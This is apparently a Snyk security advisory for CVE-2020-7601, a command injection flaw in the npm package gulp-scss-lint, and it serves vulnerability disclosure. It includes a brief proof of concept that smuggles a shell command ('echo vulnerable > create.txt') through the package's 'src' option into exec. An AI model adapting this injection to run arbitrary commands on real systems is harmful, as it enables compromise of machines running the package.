Command Injection Affecting gulp-scss-lint package, versions *
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
1.02% (85th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-JS-GULPSCSSLINT-560114
- published 13 Mar 2020
- disclosed 13 Mar 2020
- credit JHU System Security Lab
Introduced: 13 Mar 2020
CVE-2020-7601 Open this link in a new tabHow to fix?
A fix was pushed into the master
branch but not yet published.
Overview
gulp-scss-lint is a Lint your .scss files.
Affected versions of this package are vulnerable to Command Injection. It is possible to inject arbitrary commands to the exec
function located in src/command.js
via the provided options.
PoC by JHU System Security Lab
var root = require("gulp-scss-lint");
var attack_code = "echo vulnerable > create.txt";
var opt = {
"src": attack_code
}
root(opt);
References
CVSS Scores
version 3.1